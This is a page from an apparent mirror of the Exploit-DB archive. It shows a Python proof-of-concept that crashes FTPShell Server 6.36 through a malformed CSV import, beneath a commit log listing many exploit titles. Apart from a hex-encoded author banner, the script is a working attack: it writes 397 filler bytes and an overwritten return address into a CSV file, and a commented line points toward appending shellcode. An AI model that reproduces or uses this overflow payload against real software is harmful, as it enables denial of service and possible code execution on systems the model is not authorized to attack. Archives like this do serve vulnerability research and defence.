bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/platforms/windows/dos/40965.py
Offensive Security 6a202bbb97 DB: 2016-12-27 
4 new exploits

Serv-U FTP Server < 5.2 - Remote Denial of Service
RhinoSoft Serv-U FTP Server < 5.2 - Remote Denial of Service

Serv-U FTP Server 7.3 - Authenticated (stou con:1) Denial of Service
RhinoSoft Serv-U FTP Server 7.3 - Authenticated (stou con:1) Denial of Service

Serv-U FTP Server 7.4.0.1 - (SMNT) Authenticated Denial of Service
RhinoSoft Serv-U FTP Server 7.4.0.1 - (SMNT) Authenticated Denial of Service

FTPShell Server 6.36 - '.csv' Local Denial of Service

Serv-U FTP Server 3.x < 5.x - Privilege Escalation
RhinoSoft Serv-U FTP Server 3.x < 5.x - Privilege Escalation

Wampserver 3.0.6 - Insecure File Permissions Privilege Escalation

Serv-U FTP Server 7.4.0.1 - (MKD) Create Arbitrary Directories Exploit
RhinoSoft Serv-U FTP Server 7.4.0.1 - 'MKD' Create Arbitrary Directories Exploit

Serv-U FTP Server 2.4/2.5 - FTP Directory Traversal
Cat Soft Serv-U FTP Server 2.4/2.5 - FTP Directory Traversal

IndexScript 2.8 - (show_cat.php cat_id) SQL Injection
IndexScript 2.8 - 'cat_id' Parameter SQL Injection

GForge < 4.6b2 - (skill_delete) SQL Injection
GForge < 4.6b2 - 'skill_delete' Parameter SQL Injection

torrenttrader classic 1.07 - Multiple Vulnerabilities
TorrentTrader Classic 1.07 - Multiple Vulnerabilities

Camera Life 2.6.2 - 'id' SQL Injection
Camera Life 2.6.2 - 'id' Parameter SQL Injection

Full PHP Emlak Script - 'arsaprint.php id' SQL Injection
Full PHP Emlak Script - 'arsaprint.php' SQL Injection

CCMS 3.1 - (skin) Multiple Local File Inclusion
CCMS 3.1 - 'skin' Parameter Local File Inclusion

JMweb - Multiple (src) Local File Inclusion
JMweb - 'src' Parameter Local File Inclusion

geccBBlite 2.0 - (leggi.php id) SQL Injection
geccBBlite 2.0 - 'id' Parameter SQL Injection
PHP-Fusion Mod raidtracker_panel - (INFO_RAID_ID) SQL Injection
PHP-Fusion Mod recept - (kat_id) SQL Injection
PHP-Fusion Mod raidtracker_panel - 'INFO_RAID_ID' Parameter SQL Injection
PHP-Fusion Mod recept - 'kat_id' Parameter SQL Injection

Yerba SACphp 6.3 - (mod) Local File Inclusion
Yerba SACphp 6.3 - Local File Inclusion

Joomla! Component com_hotspots - (w) SQL Injection
Joomla! Component com_hotspots - SQL Injection
PHP Realtor 1.5 - (view_cat.php v_cat) SQL Injection
PHP Auto Dealer 2.7 - (view_cat.php v_cat) SQL Injection
PHP Autos 2.9.1 - (searchresults.php catid) SQL Injection
Built2Go PHP Realestate 1.5 - (event_detail.php) SQL Injection
PHP Realtor 1.5 - 'v_cat' Parameter SQL Injection
PHP Auto Dealer 2.7 - 'v_cat' Parameter SQL Injection
PHP Autos 2.9.1 - 'catid' Parameter SQL Injection
Built2Go PHP Realestate 1.5 - 'event_detail.php' SQL Injection

AdMan 1.1.20070907 - 'campaignId' SQL Injection
AdMan 1.1.20070907 - 'campaignId' Parameter SQL Injection
Gforge 4.5.19 - Multiple SQL Injections
Gforge 4.6 rc1 - (skill_edit) SQL Injection
GForge 4.5.19 - Multiple SQL Injections
Gforge 4.6 rc1 - 'skill_edit' Parameter SQL Injection

camera Life 2.6.2b4 - SQL Injection / Cross-Site Scripting
Camera Life 2.6.2b4 - SQL Injection / Cross-Site Scripting

IranMC Arad Center - 'news.php id' SQL Injection
IranMC Arad Center - SQL Injection

Ayco Okul Portali - (linkid) SQL Injection (tr)
Ayco Okul Portali - 'linkid' Parameter SQL Injection

Easynet4u faq Host - 'faq.php faq' SQL Injection
Easynet4u faq Host - 'faq.php' SQL Injection
MunzurSoft Wep Portal W3 - (kat) SQL Injection
Easynet4u Link Host - 'cat_id' SQL Injection
SlimCMS 1.0.0 - (redirect.php) Privilege Escalation
Joomla! Component ownbiblio 1.5.3 - 'catid' SQL Injection
MunzurSoft Wep Portal W3 - 'kat' Parameter SQL Injection
Easynet4u Link Host - 'cat_id' Parameter SQL Injection
SlimCMS 1.0.0 - 'redirect.php' Privilege Escalation
Joomla! Component ownbiblio 1.5.3 - 'catid' Parameter SQL Injection

Real Estate Scripts 2008 - 'index.php cat' SQL Injection
Real Estate Scripts 2008 - 'cat' Parameter SQL Injection
ParsBlogger - 'links.asp id' SQL Injection
IndexScript 3.0 - (sug_cat.php parent_id) SQL Injection
ParsBlogger - 'links.asp' SQL Injection
IndexScript 3.0 - 'parent_id' Parameter SQL Injection

XOOPS Module xhresim - 'index.php no' SQL Injection
XOOPS Module xhresim - SQL Injection

SezHoo 0.1 - (IP) Remote File Inclusion
SezHoo 0.1 - Remote File Inclusion

torrenttrader classic 1.09 - Multiple Vulnerabilities
TorrentTrader Classic 1.09 - Multiple Vulnerabilities

AdaptCMS Lite 1.5 2009-07-07 - Exploit
AdaptCMS Lite 1.5 - Arbitrary Add Admin

Absolute Poll Manager XE 4.1 - xlaapmview.asp Cross-Site Scripting
Absolute Poll Manager XE 4.1 - 'xlaapmview.asp' Cross-Site Scripting

GForge 3.1/4.5/4.6 - Verify.php Cross-Site Scripting
GForge 3.1/4.5/4.6 - 'Verify.php' Cross-Site Scripting
OpenNMS 1.5.x - j_acegi_security_check j_username Parameter Cross-Site Scripting
OpenNMS 1.5.x - notification/list.jsp 'Username' Parameter Cross-Site Scripting
OpenNMS 1.5.x - event/list filter Parameter Cross-Site Scripting
OpenNMS 1.5.x - 'j_username' Parameter Cross-Site Scripting
OpenNMS 1.5.x - 'Username' Parameter Cross-Site Scripting
OpenNMS 1.5.x - 'filter' Parameter Cross-Site Scripting
ManageEngine ADManager Plus 5.2 Build 5210 - DomainConfig.do Operation Parameter Cross-Site Scripting
ManageEngine ADManager Plus 5.2 Build 5210 - jsp/AddDC.jsp domainName Parameter Cross-Site Scripting
ManageEngine ADManager Plus 5.2 Build 5210 - 'Operation' Parameter Cross-Site Scripting
ManageEngine ADManager Plus 5.2 Build 5210 - 'domainName' Parameter Cross-Site Scripting
Joomla! Component Blog Calendar - SQL Injection
PHPMailer 5.2.17 - Remote Code Execution
2016-12-27 05:01:16 +00:00

96 lines
6 KiB
Python
Executable file
Raw Blame History

#Exploit FTPShell server 6.36 '.csv' Crash(PoC)
#Author: albalawi_sultan
#Tested on:win7
#st :http://www.ftpshell.com/download.htm
#1-open FTPShell Server Administrator
#2-manage Ftp accounts
#3-import from csv
ban= '\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x5c\x20\x20\x20\x2d\x20\x20'
ban+='\x2d\x20\x20\x2d\x20\x3c\x73\x65\x72\x76\x65\x72\x3e\x20\x20\x2d'
ban+='\x20\x5c\x2d\x2d\x2d\x3c\x20\x2d\x20\x2d\x20\x20\x2d\x20\x2d\x20'
ban+='\x20\x2d\x20\x20\x2a\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x2a\x2a\x2a\x0d\x0a\x20\x20\x20'
ban+='\x20\x20\x20\x20\x7c\x20\x20\x20\x20\x44\x6f\x63\x5f\x41\x74\x74'
ban+='\x61\x63\x6b\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2a\x2a\x2a'
ban+='\x2a\x2a\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x7c\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x20\x20\x20\x20'
ban+='\x20\x20\x20\x76\x20\x20\x20\x20\x20\x20\x20\x20\x60\x20\x60\x2e'
ban+='\x20\x20\x20\x20\x2c\x3b\x27\x20\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2a\x2a\x2a\x2a\x41\x70\x50'
ban+='\x2a\x2a\x2a\x2a\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x60\x2e\x20\x20\x2c\x27\x2f\x20\x2e\x27'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d'
ban+='\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x60\x2e\x20\x58\x20\x2f\x2e\x27\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x2a\x20\x20\x20\x20\x20\x2a\x2a\x2a'
ban+='\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x20\x20\x20\x20'
ban+='\x20\x20\x20\x2e\x2d\x3b\x2d\x2d\x27\x27\x2d\x2d\x2e\x5f\x60\x20'
ban+='\x60\x20\x28\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x2a\x2a\x2a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x7c\x0d'
ban+='\x0a\x20\x20\x20\x20\x20\x2e\x27\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x2f\x20\x20\x20\x20\x27\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x2a\x2a\x2a\x2a\x2a\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x7c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x0d\x0a\x20'
ban+='\x20\x20\x20\x20\x3b\x53\x65\x63\x75\x72\x69\x74\x79\x60\x20\x20'
ban+='\x27\x20\x30\x20\x20\x30\x20\x27\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x2a\x2a\x2a\x4e\x45\x54\x2a\x2a\x2a\x20\x20\x20\x20\x20\x20'
ban+='\x20\x7c\x0d\x0a\x20\x20\x20\x20\x2c\x20\x20\x20\x20\x20\x20\x20'
ban+='\x2c\x20\x20\x20\x20\x27\x20\x20\x7c\x20\x20\x27\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x20'
ban+='\x20\x20\x20\x20\x20\x20\x5e\x0d\x0a\x20\x2c\x2e\x20\x7c\x20\x20'
ban+='\x20\x20\x20\x20\x20\x27\x20\x20\x20\x20\x20\x60\x2e\x5f\x2e\x27'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x7c'
ban+='\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x5e\x2d\x2d\x2d\x5e\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x2f\x0d\x0a\x20\x3a\x20\x20\x2e\x20\x60'
ban+='\x20\x20\x3b\x20\x20\x20\x60\x20\x20\x60\x20\x2d\x2d\x2c\x2e\x2e'
ban+='\x5f\x3b\x2d\x2d\x2d\x3e\x20\x20\x20\x20\x20\x20\x20\x20\x20\x7c'
ban+='\x20\x20\x20\x20\x20\x20\x20\x27\x2e\x27\x2e\x27\x5f\x5f\x5f\x5f'
ban+='\x5f\x5f\x5f\x5f\x20\x2a\x0d\x0a\x20\x20\x27\x20\x60\x20\x20\x20'
ban+='\x20\x2c\x20\x20\x20\x29\x20\x20\x20\x2e\x27\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x5e\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x7c\x5f\x7c\x20\x46\x69\x72\x65\x77'
ban+='\x61\x6c\x6c\x20\x29\x0d\x0a\x20\x20\x20\x20\x20\x60\x2e\x5f\x20'
ban+='\x2c\x20\x20\x27\x20\x20\x20\x2f\x5f\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x7c\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x7c\x7c\x20\x20\x20\x20'
ban+='\x7c\x7c\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x3b\x20\x2c\x27'
ban+='\x27\x2d\x2c\x3b\x27\x20\x60\x60\x2d\x5f\x5f\x5f\x5f\x5f\x5f\x5f'
ban+='\x5f\x5f\x5f\x5f\x5f\x5f\x5f\x5f\x5f\x5f\x7c\x0d\x0a\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x60\x60\x2d\x2e\x2e\x5f\x5f\x60\x60\x2d'
ban+='\x2d\x60\x20\x20\x20\x20\x20\x20\x20\x69\x70\x73\x20\x20\x20\x20'
ban+='\x20\x20\x20\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x5e'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2f\x0d\x0a\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x27'
ban+='\x2e\x20\x5f\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2a\x0d\x0a\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x2d\x5f\x5f\x5f\x5f\x5f\x5f\x5f\x20'
ban+='\x7c\x5f\x20\x20\x49\x50\x53\x20\x20\x20\x20\x20\x29\x0d\x0a\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x7c\x7c\x20\x20\x20\x20\x20\x7c\x7c\x0d\x0a\x20'
ban+='\n'
ban+='\x53\x75\x6c\x74\x61\x6e\x5f\x41\x6c\x62\x61\x6c\x61\x77\x69\n'
ban+='\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x66\x61\x63\x65\x62\x6f\x6f\x6b\x2e\x63\x6f\x6d\x2f\x70\x65\x6e\x74\x65\x73\x74\x33\n'
ban+="\x61\x6c\x62\x61\x6c\x61\x77\x69\x34\x70\x65\x6e\x74\x65\x73\x74\x40\x67\x6d\x61\x69\x6c\x2e\x63\x6f\x6d"
print ban
import struct
E = struct.pack("<L",0x00F39658)#JMP to KERNELBA.CloseHandle
#397
EXp="\x41"*397+E
#E2+'\x90'*1+E1+"\x90"*1+E+'\x90'*1+sc
upfile="Exoploit_ftpshell.csv"
file=open(upfile,"w")
file.write(EXp)
file.close()
print 'done:- {}'.format(upfile)
Reference in a new issue View git blame Copy permalink